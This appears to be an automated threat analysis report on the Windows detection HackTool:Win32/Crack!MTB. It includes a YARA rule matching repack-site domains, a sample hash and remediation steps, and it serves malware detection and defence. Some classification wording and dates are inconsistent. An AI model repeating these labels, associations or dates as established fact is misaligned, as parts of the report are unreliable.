HackTool:Win32/Crack!MTB - Windows Defender Threat Analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: HackTool:Win32/Crack!MTB
Classification:
Type: HackTool
Platform: Win32
Family: Crack
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !MTB (detected via machine learning and behavioral analysis)
Detection Method: Behavioral
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: HackTool (a tool used to exploit vulnerabilities), targeting the 32-bit Windows platform, family Crack.

Summary:

This concrete detection identifies a hack tool designed to bypass software protection. It carries significant risk, as it is strongly associated with known malware families such as Brontok and JowoBot, which can facilitate information theft and botnet activity.

Severity: High
VDM Static Detection:
Relevant strings associated with this threat:
YARA Rule:
rule HackTool_Win32_Crack_2147745913_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "HackTool:Win32/Crack!MTB"
        threat_id = "2147745913"
        type = "HackTool"
        platform = "Win32: Windows 32-bit platform"
        family = "Crack"
        severity = "High"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "6"
        strings_accuracy = "High"
    strings:
        $x_2_1 = "RarExtInstaller.pdb" ascii //weight: 2
        $x_1_2 = "C:\\NeverShow.txt" ascii //weight: 1
        $x_1_3 = "OnClick" ascii //weight: 1
        $x_1_4 = "repacks.ddns.net" ascii //weight: 1
        $x_1_5 = "repack.me" ascii //weight: 1
        $x_1_6 = "Activation" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (
            ((1 of ($x_2_*) and 4 of ($x_1_*))) or
            (all of ($x*))
        )
}
Known malware associated with this threat:
Filename: conspiracy.exe
SHA-256: c3d568da2c0055824bfc629de90970014fe15164693f7acc478dc7e06891516f
Date: 04/01/2026
Remediation Steps:
Isolate the affected system, perform a comprehensive antivirus scan to remove the threat and any associated malware, and educate users on avoiding unauthorized software sources.
=== END REPORT ===
This analysis was last updated on 03/01/2026.